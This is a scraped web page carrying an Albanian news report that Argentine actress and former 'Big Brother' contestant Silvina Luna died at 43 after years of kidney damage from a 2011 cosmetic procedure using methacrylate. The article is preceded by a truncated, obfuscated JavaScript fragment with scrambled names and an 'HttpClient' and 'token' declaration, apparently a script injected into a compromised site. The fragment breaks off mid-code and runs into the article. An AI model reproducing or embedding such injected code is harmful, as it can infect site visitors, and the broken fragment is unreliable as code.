;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Iu nënshtrua operacionit plastik, vdes ish-banorja e “Big Brother”

By

Një aktore në Argjentinë ka humbur jetën pas një operacioni plastik. Silvina Luna vdiq në moshën 43-vjeçare për shkak të komplikimeve të rënda pas ndërhyrjes estetike.

Luna, ish e dashura e ish-futbollistit argjentinas, Daniel Osvaldo, vuante nga veshkat për shkak të një procedure të kryer në vitin 2011 nga një mjek, ndërkohë që iu ndalua ushtrimi i profesionit.

Aktorja, ish-pjesëmarrëse e “Big Brother”, e shtruar prej më shumë se dy muajsh në spitalin italian të Buenos Aires, ishte në listën e pritjes për transplantin e veshkës, por nuk kishte të drejtë ta bënte atë për shkak të kushteve delikate të shëndetit të saj.

Iu nënshtrua operacionit plastik, vdes ish-banorja e “Big

Shoqata Argjentinase e Aktorëve shprehu “trishtimin e thellë” për incidentin, duke kujtuar karrierën 25-vjeçare të aktores, modeles dhe prezantueses.

Si aktore ka qenë pjesë e kasteve dhe shfaqjeve të ndryshme humoristike, në televizion ka pasur pjesëmarrje të veçanta në telenovela seriale si ‘El Capo’ dhe ‘Ciega a Citas’. Po ashtu ka luajtur në filmin e saj të parë në vitin 2015, ‘Loca ella, loco yo’.

Ajo ishte gjithashtu një paneliste e ‘Fox for Everyone’, një program që përziente botën e futbollit dhe argëtimit.

Problemet shëndetësore të Luna filluan në vitin 2014, kur u shtrua në spital për gurët në veshka, problem i një ndërhyrjeje për zmadhimin e të pasmeve, në të cilat u aplikua metakrilat, një përbërës plastik që përdoret në mjekësi për prodhimin e kockave dhe protezave dentare, materiali i të cilit rrjedh në qarkullimin e gjakut.

Artikuj të ngjashëm